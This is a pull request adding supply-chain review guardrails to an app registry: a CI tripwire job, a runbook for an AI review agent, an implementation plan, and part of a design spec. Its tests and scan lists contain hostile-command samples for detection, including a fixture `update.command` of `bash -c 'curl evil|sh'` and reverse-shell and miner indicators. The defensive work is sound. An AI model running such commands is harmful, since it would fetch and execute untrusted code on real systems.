### PR TITLE
Add PR review spec: runbook, provenance trust model, and CI guardrails

### DIFF
--- a/.github/workflows/pr-checks.yml
+++ b/.github/workflows/pr-checks.yml
@@ -28,6 +28,14 @@ jobs:
             echo "validate $d"
             node scripts/read-descriptor.mjs "$d" >/dev/null
           done
+      - name: Audit every registry descriptor (review-bar guardrails)
+        run: |
+          set -e
+          shopt -s nullglob
+          for d in registry/*/flatpark.yml; do
+            echo "audit $d"
+            node scripts/audit-descriptor.mjs "$d"   # exit 1 on hard fail; warnings print but pass
+          done
       - name: Install site deps
         working-directory: site
         run: npm ci || npm install --no-audit --no-fund
@@ -35,6 +43,50 @@ jobs:
         run: bash tests/run-tests.sh
       - name: Dead-link check (hotlinked screenshots etc.)
         run: ./scripts/check-links.sh
+
+  # Tripwire: a PR that touches CI-executed automation (.github, scripts,
+  # registry resolvers, a descriptor's update.command) is gated. These surfaces
+  # run on a repo-write token in update-check.yml — a malicious resolver is a
+  # real automation surface even though it never reaches the signing key. The
+  # threat is an *external* contributor sneaking such a change in, so the gate
+  # hard-fails only for untrusted authors; for a trusted author (OWNER / MEMBER /
+  # COLLABORATOR) it just surfaces a notice and passes, so the maintainer's own
+  # infra PRs aren't blocked. No secrets; read-only token.
+  guard-infra:
+    runs-on: ubuntu-latest
+    permissions:
+      contents: read
+    steps:
+      - uses: actions/checkout@v4
+        with:
+          fetch-depth: 0
+      - name: Gate infra / resolver / update.command changes
+        run: |
+          base="${{ github.event.pull_request.base.sha }}"
+          assoc="${{ github.event.pull_request.author_association }}"
+          flagged=""
+          while IFS= read -r f; do
+            [ -n "$f" ] || continue
+            case "$f" in
+              .github/*|scripts/*|registry/*/resolve-update.sh) flagged="${flagged}  - ${f}"$'\n';;
+            esac
+          done < <(git diff --name-only "$base" HEAD)
+          # An added/removed `command:` line in any descriptor = an update.command change.
+          if git diff "$base" HEAD -- 'registry/*/flatpark.yml' | grep -qE '^[+-][[:space:]]*command:'; then
+            flagged="${flagged}  - registry/*/flatpark.yml (update.command)"$'\n'
+          fi
+          if [ -z "$flagged" ]; then
+            echo "No infra/resolver/update.command changes."
+            exit 0
+          fi
+          printf 'Flagged changes:\n%s\n' "$flagged"
+          case "$assoc" in
+            OWNER|MEMBER|COLLABORATOR)
+              echo "::notice::Infra/automation change by a trusted author ($assoc) — surfaced for review, not blocking." ;;
+            *)
+              echo "::error::Infra/automation change by an external author ($assoc). A maintainer must review per docs/pr-review.md (Phase 1 high-scrutiny) before merge."
+              exit 1 ;;
+          esac
 
   # Build the changed apps to catch manifest breakage BEFORE merge, and upload an
   # installable single-file bundle per app so the change can be test-installed

--- a/docs/pr-review.md
+++ b/docs/pr-review.md
@@ -1,0 +1,196 @@
+# FlatPark PR review runbook
+
+The maintainer's review process for incoming PRs — primarily new-app and
+app-update submissions. An AI agent runs this top to bottom; a human merges.
+
+**How to run it:** for "review PR #N", copy the [template](#review-template) into
+your working notes, then work the phases in order, filling one row at a time with
+verifiable evidence (command output, `file:line`, a hash, a URL). The output is
+the filled template plus a drafted PR comment. **The reviewer recommends only —
+it never merges or publishes.**
+
+> **Rule of engagement — never execute untrusted code.** No running `install.sh`,
+> manifest `build-commands`, the app, `npm`/`pip`, or any shipped binary/script/
+> installer. Static analysis only. Download artifacts as **bytes** into an
+> isolated temp dir, inspect before extracting, and run nothing inside. If a
+> decision genuinely needs execution to resolve, escalate to a human.
+
+This runbook is the single source of truth; the public
+[listing policies](https://flatpark.org/policies/) and the
+[publishing guide](https://flatpark.org/contributing/) are audience-tuned
+summaries of it. It layers on top of `.github/workflows/pr-checks.yml` (which
+validates descriptors, tests, dead-link-checks, and does a no-secrets fork
+build) and the `scripts/audit-descriptor.mjs` guardrails — this runbook owns the
+judgment calls CI can't make.
+
+## Provenance-based trust model
+
+License is **not** the trust axis — it is compliance input only. Non-FOSS is
+allowed (the registry ships proprietary broker apps), and open-source apps are
+often shipped as official prebuilts rather than source builds (e.g. electerm).
+What matters is **where the bytes you run come from**. Place each submission in a
+tier:
+
+- **Tier 1 — source-built / reproducible / source-verifiable.** Shipped
+  interpreted code is byte-for-byte identical to the public source, or the build
+  is reproducible from the manifest.
+- **Tier 2 — official upstream prebuilt (the dominant case).** The vendor's or
+  genuine project's own release, repackaged unmodified. Requires: (1) **official
+  download source** — every `extra-data`/`archive` URL on the vendor's official
+  domain or genuine upstream repo, not the submitter's account or a mirror;
+  (2) **unmodified repackage** — `build-commands` only install the wrapper/
+  desktop/metainfo/icon + an `apply_extra` that unpacks the official download; no
+  patch/`sed`/recompile/behavior change; shipped artifact == what the official
+  URL serves; (3) **pinned bytes** — sha256 (+ size for extra-data).
+- **Tier 3 — opaque third-party / submitter-built binary.** Neither
+  source-verifiable nor a pinned official-upstream release (PR #13). **Reject.**
+
+## Phases
+
+### Phase 0 — Rules of engagement (safety)
+Static-only; nothing executed. Artifacts downloaded as bytes into an isolated
+temp dir; inspect-before-extract (traversal/symlink/setuid); extract
+`--no-same-owner --no-same-permissions`; run nothing. Read-only `gh`. Execution
+needed to decide → escalate to a human.
+
+### Phase 1 — Scope & classification
+Classify: new app (`registry/<id>/`) / existing-app change / infrastructure.
+**High-scrutiny surface (STOP if a non-owner touches it):** `.github/`,
+`scripts/`, signing config, `registry/*/resolve-update.sh`, and a `flatpark.yml`
+`update.command` — these are CI-executed on a repo-write token
+(`update-check.yml` runs `contents: write` + `pull-requests: write`;
+`check-updates.sh` `eval`s `update.command`). Identify the changed app id(s).
+
+### Phase 2 — Submitter & provenance
+Account age, history, social graph, other repos, prior contributions. Source-repo
+age and corroboration; commit identity (watch for malformed emails); timeline
+plausibility (account → repo → release within hours is a red flag). Emit a trust
+tier: established / unknown-but-plausible / throwaway-suspicious. Assign the
+artifact provenance tier (1/2/3).
+
+### Phase 3 — Descriptor & manifest static review
+- **Source pinning, per type:** `git` → immutable `commit` (reject branch/tag
+  only); `archive` → `sha256` + genuine-upstream URL; `extra-data` → `sha256` +
+  non-zero `size`; `file` → local, reviewed as part of the PR; other → NEEDS-HUMAN.
+- **finish-args risk scan:** near-auto-reject on escape perms
+  (`--talk-name=org.freedesktop.Flatpak`, `--filesystem=host`, `--filesystem=/`);
+  warn on `--device=all`, `--filesystem=home`, needless `--share=network`.
+- **`policy:` block vs reality:** `proprietary` accurate; `dangerous_permissions`
+  covers the high-risk finish-args actually used (hard enforcement deferred — see
+  guardrail G2(b)).
+- **build-commands:** read every line; flag network fetch, `curl|bash`, writes
+  outside the build dir, and **any modification of the vendor payload/behavior**.
+- **source URLs** resolve to genuine upstream (no lookalike / fork).
+- **`app-id`** reverse-DNS matches the real vendor (impersonation / typosquat).
+- **`update.command`** is a simple relative script path (e.g. `./resolve-update.sh`).
+- **[Tier 2]** download host = official vendor domain / upstream, not the
+  submitter's personal namespace.
+
+### Phase 4 — Runtime-behavior scan
+Grep manifest + shipped scripts + source for runtime fetch-and-exec
+(`npm install`, `pip install`, `curl|wget`, `nc`, download-then-run).
+**Allowed (vendor self-updater exception):** the vendor's own installer/updater
+that downloads into the app's data/cache dir, when packaging does not patch the
+official behavior, writes stay in the per-app data/cache dir (no host-home),
+endpoints are the vendor's own, and there is no shell pipeline from an arbitrary
+URL. **Rejected:** runtime fetch-and-exec of arbitrary/unpinned third-party code
+as a core mechanism (PR #13's `npm install peerflix`), or an updater whose
+packaging patches official behavior. Review `update.command`/resolve scripts as
+code. Note network endpoints and broad filesystem×network combos.
+
+### Phase 5 — Artifact / binary provenance
+- sha256 of the artifact == manifest pin.
+- **Inspect without execution, per artifact type:** tar/tar.gz/tgz/tar.zst → list
+  entries, reject traversal/symlink-escape/setuid; zip → list with zip tooling,
+  same checks; deb/rpm → inspect payload without running maintainer scripts
+  (review those statically); shell installer (`.sh`) → static review where
+  practical, else treat as opaque official prebuilt needing stronger Tier-2
+  provenance + human judgment; **AppImage → not accepted (reject)**.
+- **[Tier 1]** shipped interpreted code == public source (byte-diff each file).
+- **[Tier 2]** shipped artifact == official download (re-fetch + hash-compare);
+  build did not alter the payload.
+- Any "official" prebuilt (node, electron, a JRE, …) hash-verified against the
+  real upstream (compare code sections / build-id where a canonical artifact
+  exists, as done for `node`). From-source builds with no reproducible build →
+  NEEDS-HUMAN, not PASS.
+- IOC scan: persistence (autostart/cron/systemd/`.bashrc`), miners
+  (`xmrig`/`stratum+`), reverse shells (`/dev/tcp`, `nc -e`), hardcoded IPs,
+  embedded second ELF, RPATH/RUNPATH injection.
+
+### Phase 6 — Compliance & purpose
+Non-FOSS / proprietary is **allowed** — not a rejection reason. Reject only for
+purpose/legality: piracy, malware or abuse tooling, trademark-infringing
+impersonation, content illegal to distribute.
+
+### Phase 7 — Verdict & report
+Decide per the rubric. Produce the filled template and a drafted PR comment.
+Reviewer recommends only — a human merges.
+
+## Decision rubric
+
+**AUTO-REJECT (any one):**
+- Compliance / legality violation (piracy, malware, trademark, illegal-to-distribute).
+- Sandbox-escape permission (`--talk-name=org.freedesktop.Flatpak`, `--filesystem=host`/`/`).
+- Unpinned / mutable source for its type (git without commit; archive/extra-data
+  without sha256; extra-data `size: 0`).
+- Tier 3 provenance (opaque third-party / submitter-built binary).
+- [Tier 1] shipped code ≠ public source.
+- [Tier 2] download source not official, OR packaging modifies the payload /
+  behavior, OR shipped artifact ≠ official download.
+- AppImage artifact.
+- Runtime fetch-and-exec of arbitrary / unpinned code as a core mechanism (the
+  vendor self-updater exception does not count).
+- `update.command` that is not a simple relative script path.
+- IOC found (traversal / setuid / persistence / miner / reverse-shell / embedded
+  payload / RPATH injection).
+- Infra/workflow/resolver tampering from an external contributor.
+- Throwaway account **+** Tier-3 binary (the PR #13 combination).
+
+**NEEDS-HUMAN:** from-source binaries not byte-verifiable · novel permission
+needing justification · borderline provenance · unknown source type · shell
+installer that can't be statically reviewed.
+
+**PASS:** clean + trusted + provenance verified for its tier.
+
+## Review template
+
+Copy this per PR and fill it in. Legend: ✅ pass · ❌ fail (hard-reject) ·
+⚠️ warn (needs justification) · 👤 needs-human · ➖ N/A. Tier: 1 =
+source-verifiable · 2 = official prebuilt · ★ = all.
+
+| # | Phase | Check | Tier | Verdict | Evidence (cmd output / `file:line` / hash / url) |
+|---|---|---|---|---|---|
+| 0 | Safety | Static-only; nothing executed; artifacts handled in an isolated dir | ★ | | |
+| 1.1 | Scope | Classified: new app / app change / infra | ★ | | |
+| 1.2 | Scope | Touches high-scrutiny surface (`.github/`·`scripts/`·signing·`resolve-update.sh`·`update.command`)? non-owner → STOP | ★ | | |
+| 2.1 | Provenance | Submitter account age / history / graph / other repos | ★ | | |
+| 2.2 | Provenance | Source repo age, corroboration | ★ | | |
+| 2.3 | Provenance | Commit identity sane (no malformed email) | ★ | | |
+| 2.4 | Provenance | Timeline plausible (not account→repo→release within hours) | ★ | | |
+| 2.5 | Provenance | Trust tier: established / unknown-plausible / throwaway-suspicious | ★ | | |
+| 2.6 | Provenance | Artifact provenance tier: 1 source-verifiable / 2 official prebuilt / 3 opaque (→reject) | ★ | | |
+| 3.1 | Manifest | Sources pinned per type (git→commit; archive/extra-data→sha256; extra-data size≠0; file→local) | ★ | | |
+| 3.2 | Manifest | finish-args has no escape perms; broad perms justified | ★ | | |
+| 3.3 | Manifest | `policy:` block honest: `proprietary` accurate, `dangerous_permissions` vs actual (warn until schema) | ★ | | |
+| 3.4 | Manifest | build-commands install-only; no patch/alter of vendor payload or behavior | ★ | | |
+| 3.5 | Manifest | source URLs = genuine upstream (no lookalike / fork) | ★ | | |
+| 3.6 | Manifest | `app-id` reverse-DNS matches real vendor (no impersonation) | ★ | | |
+| 3.7 | Manifest | `update.command` is a simple relative script path | ★ | | |
+| 3.8 | Manifest | download host = official vendor domain / upstream, not submitter account | 2 | | |
+| 4.1 | Runtime | No runtime fetch-and-exec of arbitrary/unpinned code (vendor self-updater to data dir, behavior unpatched = OK) | ★ | | |
+| 4.2 | Runtime | `update.command` / resolve script reviewed as code (runs on CI, repo-write) | ★ | | |
+| 4.3 | Runtime | Network endpoints noted; no broad filesystem×network combo | ★ | | |
+| 5.1 | Artifact | extra-data sha256 == manifest pin | ★ | | |
+| 5.2 | Artifact | Inspected per type (tar/zip/tgz/deb/rpm listed clean; AppImage rejected; .sh static-or-opaque); no traversal/symlink/setuid | ★ | | |
+| 5.3 | Artifact | shipped interpreted code == public source (byte diff) | 1 | | |
+| 5.4 | Artifact | shipped artifact == official download (re-fetch & hash); build did not alter payload | 2 | | |
+| 5.5 | Artifact | "official" prebuilts hash-verified vs upstream (from-source w/o reproducible → NEEDS-HUMAN) | ★ | | |
+| 5.6 | Artifact | IOC scan clean (persistence/miner/reverse-shell/hardcoded-IP/embedded-ELF/RPATH) | ★ | | |
+| 6.1 | Compliance | Purpose legal & policy-compliant (not piracy/malware/trademark/illegal-to-distribute) | ★ | | |
+| 6.2 | Compliance | Non-FOSS is NOT a rejection reason | ★ | | |
+| 7.1 | Verdict | Overall: AUTO-REJECT / NEEDS-HUMAN / PASS | ★ | | |
+| 7.2 | Verdict | Hard-fail triggers hit (list) | ★ | | |
+| 7.3 | Verdict | PR comment drafted; reviewer recommends only, human merges | ★ | | |
+
+Every ❌ carries verifiable evidence; the verdict follows mechanically from "any
+hard-fail row hit".

--- a/docs/superpowers/plans/2026-06-22-pr-review-guardrails.md
+++ b/docs/superpowers/plans/2026-06-22-pr-review-guardrails.md
@@ -1,0 +1,277 @@
+# PR Review Spec — Implementation Plan
+
+> **For agentic workers:** REQUIRED SUB-SKILL: Use superpowers:subagent-driven-development (recommended) or superpowers:executing-plans to implement this plan task-by-task. Steps use checkbox (`- [ ]`) syntax for tracking.
+
+**Goal:** Land the PR-review spec as three artifacts — an agent-executable runbook doc, public/contributor copy, and deterministic CI guardrails — per `docs/superpowers/specs/2026-06-22-pr-review-spec-design.md`.
+
+**Architecture:** The runbook + template are documentation transcribed from the spec. The guardrails are a single dependency-free Node validator (`scripts/audit-descriptor.mjs`) that parses a descriptor and its manifest and emits hard FAILs (exit 1) or WARNs (exit 0), wired into `pr-checks.yml`; plus a CI tripwire job for infra/resolver changes. License is never the trust axis — provenance tier is.
+
+**Tech Stack:** Node ESM (`.mjs`, no npm deps — the PR gate validates before `npm ci`), Bash test scripts under `tests/` using `tests/lib/assert.sh`, GitHub Actions.
+
+## Global Constraints
+
+- Scripts invoked by the core pipeline must be **dependency-free Node** (no `import` of npm packages); `pr-checks.yml` runs `node scripts/*.mjs` before any `npm ci`. Verbatim parse style: follow `scripts/read-descriptor.mjs` (manual line scan, not a YAML lib).
+- Tests are `tests/test_*.sh`, discovered by `tests/run-tests.sh`, using helpers from `tests/lib/assert.sh` (`assert_eq`, `assert_file`, `assert_contains`, `assert_ok`). Build-step tests self-skip without `flatpak-builder`.
+- Guardrail exit contract: **exit 1** on any hard failure, **exit 0** when only warnings. Hard FAIL lines to stderr prefixed `FAIL:`, warnings prefixed `WARN:`.
+- Hard checks must trip **no existing registry app** (all 6 must still pass). Warn-only: G2(b) declaration-consistency, G3 runtime-fetch.
+- Provenance tiers, not license. AppImage is a rejected artifact type. `update.command` must match `^\./[A-Za-z0-9._-]+$`.
+- Commit messages end with the `Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>` trailer.
+
+---
+
+## File structure
+
+- Create `docs/pr-review.md` — the runbook (Phases 0–7) + review template table (single source of truth).
+- Modify `site/src/content/pages/policies.md` — expand Review section to the provenance model; drop AppImage from "What we host".
+- Modify `site/src/content/pages/contributing.md` — append "What we review (and what gets a PR rejected)" pre-flight checklist.
+- Create `scripts/audit-descriptor.mjs` — guardrails G1, G2(a/b), G3, update.command check.
+- Create `tests/test_audit_descriptor.sh` — fixtures (pass/fail) + regression over real registry manifests.
+- Create `tests/fixtures/audit/*` — minimal good/bad descriptor+manifest pairs.
+- Modify `.github/workflows/pr-checks.yml` — call `audit-descriptor.mjs` per descriptor; add G4 infra/resolver tripwire job.
+
+---
+
+## Task 1: Runbook doc (`docs/pr-review.md`)
+
+**Files:**
+- Create: `docs/pr-review.md`
+
+**Interfaces:**
+- Produces: the canonical runbook that 2a/2b and the guardrails reference.
+
+- [ ] **Step 1:** Write `docs/pr-review.md` containing, verbatim from the spec: a one-paragraph purpose + "never execute untrusted code" banner; the Phase 0–7 runbook (spec §4); the provenance-tier model (spec §3); the decision rubric (spec §5); and the review template table (spec §7) as the copy-per-PR checklist. Open with how to run it ("review PR #N → copy the template → work top to bottom → output filled template + drafted comment; recommend only, human merges").
+- [ ] **Step 2:** Verify it renders as valid markdown and the template table has all 30 rows.
+
+Run: `node -e "const t=require('fs').readFileSync('docs/pr-review.md','utf8'); if(!t.includes('| 7.3 |')) process.exit(1)"`
+Expected: exit 0.
+
+- [ ] **Step 3: Commit**
+
+```bash
+git add docs/pr-review.md
+git commit -m "docs: add agent-executable PR review runbook + template
+
+Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>"
+```
+
+---
+
+## Task 2: Public + contributor copy
+
+**Files:**
+- Modify: `site/src/content/pages/policies.md`
+- Modify: `site/src/content/pages/contributing.md`
+
+**Interfaces:**
+- Consumes: the provenance model + rubric from Task 1 (link target `/pr-review/` or repo path).
+
+- [ ] **Step 1:** In `policies.md`, rewrite "What we host" to drop **AppImage** (current line lists "an installer, AppImage, `.deb`, `.rpm`, or tarball"), and expand "Review" to the provenance statement (spec §8.2a): source-built verified where possible OR official upstream prebuilt repackaged unmodified; official channel only; non-FOSS allowed; checksum-pinned; sandbox-escape perms rejected; unofficial/modified binaries rejected. Do not imply every FOSS prebuilt is byte-verified.
+- [ ] **Step 2:** In `contributing.md`, append a "What we review (and what gets a PR rejected)" section — the §8.2b pre-flight checklist (pin per type; official URLs; don't modify vendor payload/behavior; `update.command` is `./resolve-update.sh`; declare `policy.proprietary`/`dangerous_permissions`; no runtime fetch-and-exec of arbitrary code; no escape perms; no AppImage; legitimate purpose).
+- [ ] **Step 3:** Verify the site builds.
+
+Run: `cd site && npm run build`
+Expected: build succeeds (exit 0).
+
+- [ ] **Step 4: Commit**
+
+```bash
+git add site/src/content/pages/policies.md site/src/content/pages/contributing.md
+git commit -m "site: publish provenance-based review bar; drop AppImage
+
+Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>"
+```
+
+---
+
+## Task 3: `audit-descriptor.mjs` — G1 source-pinning (per type)
+
+**Files:**
+- Create: `scripts/audit-descriptor.mjs`
+- Create: `tests/fixtures/audit/good/` (flatpark.yml + manifest, fully pinned)
+- Create: `tests/fixtures/audit/bad-unpinned/` (extra-data missing sha256)
+- Create: `tests/test_audit_descriptor.sh`
+
+**Interfaces:**
+- Produces: `node scripts/audit-descriptor.mjs <flatpark.yml>` → exit 1 on hard fail, 0 otherwise; `FAIL:`/`WARN:` lines on stderr. Parses descriptor (`build.manifest`, `update.command`, `policy.{proprietary,dangerous_permissions}`) and the referenced manifest (`finish-args`, `modules[].sources[]`, `build-commands`).
+
+- [ ] **Step 1: Write the failing test** (`tests/test_audit_descriptor.sh`)
+
+```bash
+#!/usr/bin/env bash
+set -u
+ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)"
+. "$ROOT/tests/lib/assert.sh"
+AUDIT="node $ROOT/scripts/audit-descriptor.mjs"
+F="$ROOT/tests/fixtures/audit"
+
+# G1: a fully-pinned descriptor passes
+$AUDIT "$F/good/flatpark.yml"; assert_eq "$?" "0"
+
+# G1: extra-data without sha256 hard-fails
+out="$($AUDIT "$F/bad-unpinned/flatpark.yml" 2>&1)"; rc=$?
+assert_eq "$rc" "1"
+printf '%s' "$out" | grep -qF "FAIL:" || { echo "FAIL: expected FAIL line"; exit 1; }
+echo "ok test_audit_descriptor (G1)"
+```
+
+- [ ] **Step 2:** Create fixtures. `good/flatpark.yml` (minimal: id/name/summary, `build.manifest: m.yml`, `update.command: ./resolve-update.sh`, `policy.dangerous_permissions: []`) + `good/m.yml` with one `type: extra-data` source having `sha256` + non-zero `size`, conservative finish-args. `bad-unpinned/` identical but the source omits `sha256`.
+
+- [ ] **Step 3: Run test to verify it fails**
+
+Run: `bash tests/test_audit_descriptor.sh`
+Expected: FAIL (script not found / wrong exit).
+
+- [ ] **Step 4: Write minimal implementation** — `scripts/audit-descriptor.mjs` with the descriptor+manifest parser (mirroring `read-descriptor.mjs` style) and the G1 rule: for each manifest source, `git`→require `commit`; `archive`→require `sha256`; `extra-data`→require `sha256` and `size`≠`0`; `file`/`script`/`patch`/`dir`/`shell`→skip; unknown→`WARN`. Collect `fails[]`/`warns[]`, print them, `process.exit(fails.length ? 1 : 0)`.
+
+- [ ] **Step 5: Run test to verify it passes**
+
+Run: `bash tests/test_audit_descriptor.sh`
+Expected: `ok test_audit_descriptor (G1)`.
+
+- [ ] **Step 6: Commit**
+
+```bash
+git add scripts/audit-descriptor.mjs tests/test_audit_descriptor.sh tests/fixtures/audit
+git commit -m "scripts: add audit-descriptor with G1 per-type source pinning
+
+Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>"
+```
+
+---
+
+## Task 4: G2 finish-args (escape hard-fail + declaration warn) + update.command check
+
+**Files:**
+- Modify: `scripts/audit-descriptor.mjs`
+- Modify: `tests/test_audit_descriptor.sh`
+- Create: `tests/fixtures/audit/bad-escape/` (manifest with `--filesystem=host`)
+- Create: `tests/fixtures/audit/bad-updatecmd/` (descriptor with non-relative `update.command`)
+
+**Interfaces:**
+- Consumes: parser + `fails`/`warns` from Task 3.
+
+- [ ] **Step 1: Write the failing tests** — append:
+
+```bash
+# G2(a): escape permission hard-fails
+out="$($AUDIT "$F/bad-escape/flatpark.yml" 2>&1)"; assert_eq "$?" "1"
+printf '%s' "$out" | grep -qF "filesystem=host" || { echo "FAIL: escape perm not reported"; exit 1; }
+
+# update.command must be a simple relative path
+out="$($AUDIT "$F/bad-updatecmd/flatpark.yml" 2>&1)"; assert_eq "$?" "1"
+printf '%s' "$out" | grep -qiF "update.command" || { echo "FAIL: update.command not reported"; exit 1; }
+echo "ok test_audit_descriptor (G2 + update.command)"
+```
+
+- [ ] **Step 2:** Create `bad-escape/` (finish-args includes `- --filesystem=host`) and `bad-updatecmd/` (`update.command: bash -c 'curl evil|sh'`).
+- [ ] **Step 3: Run to verify it fails.** Run: `bash tests/test_audit_descriptor.sh` → FAIL.
+- [ ] **Step 4: Implement** — add to the script: (a) escape-perm hard-fail set `['--talk-name=org.freedesktop.Flatpak','--filesystem=host','--filesystem=/']` → any present finish-arg in set → `FAIL`; (b) declaration-consistency warn set `['--device=all','--filesystem=home']` → if present and not in `policy.dangerous_permissions` → `WARN`; and the `update.command` regex `^\./[A-Za-z0-9._-]+$` → else `FAIL`.
+- [ ] **Step 5: Run to verify it passes.** Run: `bash tests/test_audit_descriptor.sh` → ok.
+- [ ] **Step 6: Commit**
+
+```bash
+git add scripts/audit-descriptor.mjs tests/test_audit_descriptor.sh tests/fixtures/audit
+git commit -m "scripts: audit G2 escape-perm hard-fail + warn + update.command check
+
+Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>"
+```
+
+---
+
+## Task 5: G3 runtime-fetch warning
+
+**Files:**
+- Modify: `scripts/audit-descriptor.mjs`
+- Modify: `tests/test_audit_descriptor.sh`
+- Create: `tests/fixtures/audit/warn-runtimefetch/` (build-command with `npm install`)
+
+**Interfaces:**
+- Consumes: parser + `warns` from Task 3/4.
+
+- [ ] **Step 1: Write the failing test** — append:
+
+```bash
+# G3: runtime npm install warns but does NOT fail
+out="$($AUDIT "$F/warn-runtimefetch/flatpark.yml" 2>&1)"; rc=$?
+assert_eq "$rc" "0"
+printf '%s' "$out" | grep -qF "WARN:" || { echo "FAIL: expected WARN line"; exit 1; }
+echo "ok test_audit_descriptor (G3)"
+```
+
+- [ ] **Step 2:** Create `warn-runtimefetch/` with a build-command `- npm install --prefix x peerflix` (otherwise valid, pinned).
+- [ ] **Step 3: Run to verify it fails.** Run: `bash tests/test_audit_descriptor.sh` → FAIL (no warn yet).
+- [ ] **Step 4: Implement** — grep `build-commands` (and any `*.sh`/wrapper files in the descriptor dir) for `/\bnpm install\b/`, `/\bpip install\b/`, `/curl[^\n]*\|\s*sh/`, `/wget[^\n]*\|\s*sh/` → `WARN` (never fail; vendor self-updaters are expected here).
+- [ ] **Step 5: Run to verify it passes.** Run: `bash tests/test_audit_descriptor.sh` → ok.
+- [ ] **Step 6: Commit**
+
+```bash
+git add scripts/audit-descriptor.mjs tests/test_audit_descriptor.sh tests/fixtures/audit
+git commit -m "scripts: audit G3 runtime fetch-and-exec warning
+
+Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>"
+```
+
+---
+
+## Task 6: Regression — every existing registry app passes
+
+**Files:**
+- Modify: `tests/test_audit_descriptor.sh`
+
+**Interfaces:**
+- Consumes: the finished `audit-descriptor.mjs`.
+
+- [ ] **Step 1: Write the test** — append: loop all real descriptors, assert exit 0 (no hard fail on shipping apps):
+
+```bash
+for d in "$ROOT"/registry/*/flatpark.yml; do
+  $AUDIT "$d" >/dev/null 2>&1 || { echo "FAIL: audit hard-failed on shipping app $d"; exit 1; }
+done
+echo "ok test_audit_descriptor (registry regression)"
+```
+
+- [ ] **Step 2: Run.** Run: `bash tests/test_audit_descriptor.sh`. Expected: ok. If any real app hard-fails, the parser or a rule is wrong — fix the script (not the app), re-run.
+- [ ] **Step 3: Run the whole suite.** Run: `bash tests/run-tests.sh`. Expected: all `ok`, exit 0.
+- [ ] **Step 4: Commit**
+
+```bash
+git add tests/test_audit_descriptor.sh
+git commit -m "test: audit-descriptor passes on all shipping registry apps
+
+Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>"
+```
+
+---
+
+## Task 7: Wire into CI + G4 infra/resolver tripwire
+
+**Files:**
+- Modify: `.github/workflows/pr-checks.yml`
+
+**Interfaces:**
+- Consumes: `audit-descriptor.mjs`.
+
+- [ ] **Step 1:** In the `lint-and-test` job, after the descriptor-validate loop, add a step that runs `node scripts/audit-descriptor.mjs "$d"` for every `registry/*/flatpark.yml` (fails the job on exit 1; warnings are printed).
+- [ ] **Step 2:** Add a `guard-infra` job (no secrets, `contents: read`) that computes changed paths against the PR base and **fails with a "needs maintainer review" message** if any changed path matches `^\.github/`, `^scripts/`, signing config, `registry/.*/resolve-update\.sh`, or if a changed `flatpark.yml` alters `update.command`. Use `scripts/changed-apps.sh`'s base-sha pattern / `git diff --name-only`.
+- [ ] **Step 3: Validate the workflow YAML.**
+
+Run: `node -e "require('fs').readFileSync('.github/workflows/pr-checks.yml','utf8')"` and (if available) `npx --yes yaml-lint .github/workflows/pr-checks.yml || true`
+Expected: no parse error.
+
+- [ ] **Step 4: Commit**
+
+```bash
+git add .github/workflows/pr-checks.yml
+git commit -m "ci: run audit-descriptor per app + infra/resolver-change tripwire
+
+Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>"
+```
+
+---
+
+## Self-Review
+
+- **Spec coverage:** §3 provenance model → Task 1 doc + tiers drive rubric; §4 runbook → Task 1; §7 template → Task 1; §8.2a → Task 2 policies.md (+AppImage drop); §8.2b → Task 2 contributing.md; §9 G1 → Task 3; G2(a/b) + update.command → Task 4; G3 → Task 5; G4 → Task 7; regression (no false-fail of shipping apps) → Task 6. Backlog items (dangerous_permissions schema, reproducible-build, AppImage-reject descriptor check, XXE metainfo, `eval` removal) intentionally deferred per spec §9/§11.
+- **Placeholder scan:** each code step shows the test or the rule set; fixtures enumerated; exit contract fixed in Global Constraints.
+- **Type consistency:** the script's contract (exit code + `FAIL:`/`WARN:` prefixes) is identical across Tasks 3–7; tests assert on those exact prefixes.
+- **Note:** AppImage-as-artifact and Tier-2 official-host checks are runbook/human judgments this round (backlog for automation), so no guardrail task asserts them — consistent with spec §9 backlog.

--- a/docs/superpowers/specs/2026-06-22-pr-review-spec-design.md
+++ b/docs/superpowers/specs/2026-06-22-pr-review-spec-design.md
@@ -1,0 +1,383 @@
+# FlatPark PR Review Spec — Design
+
+Date: 2026-06-22
+Status: approved design (revised per Codex review notes), pending implementation plan
+Origin case: PR #13 ("add Native Popcorn") — a Popcorn Time-class BitTorrent
+streaming client submitted by a ~2-hour-old throwaway account, shipping an
+opaque, non-reproducible prebuilt binary from the submitter's own GitHub
+release. Closed. This spec generalizes that review into a repeatable process.
+
+Revision note: the original draft split reviews by license (open-source vs
+proprietary). That was wrong for FlatPark — `org.electerm.Electerm` is
+`proprietary: false` yet ships an **official prebuilt** release tarball, not a
+source build. The trust axis is therefore **artifact provenance**, not license.
+See review notes: `2026-06-22-pr-review-spec-design-review-notes.md`.
+
+## 1. Goal
+
+Give FlatPark a written, repeatable review process for incoming PRs — primarily
+new-app and app-update submissions — that an AI agent (the maintainer's agent)
+executes top-to-bottom, plus a small set of deterministic CI guardrails. The
+process owns the judgment calls that CI cannot make: provenance, supply-chain
+trust, binary integrity, and compliance.
+
+This layers **on top of** the existing automated gate in
+`.github/workflows/pr-checks.yml`, which already validates every descriptor,
+runs the shell test suite, dead-link-checks hotlinked screenshots, and builds
+changed apps with a throwaway signing key and **no secrets** (fork PRs cannot
+reach the real signing key or R2/Pages credentials; untrusted build-commands are
+gated behind GitHub's "require approval for fork PR workflows" setting). The
+review spec does not duplicate those mechanical checks; it adds the trust layer.
+
+## 2. Deliverables
+
+| # | Artifact | Path | Audience |
+|---|---|---|---|
+| 1 | PR-review runbook (ordered, agent-executable) + the review template table | `docs/pr-review.md` | The maintainer's agent — run on every PR |
+| 2a | Public review-bar (plain-language rules users can see and trust) | expand `site/src/content/pages/policies.md` (Review section); also drop AppImage from "What we host" | End users — public trust |
+| 2b | "What we review" contributor note | append to `site/src/content/pages/contributing.md` | Contributors' agents — pre-comply / self-check |
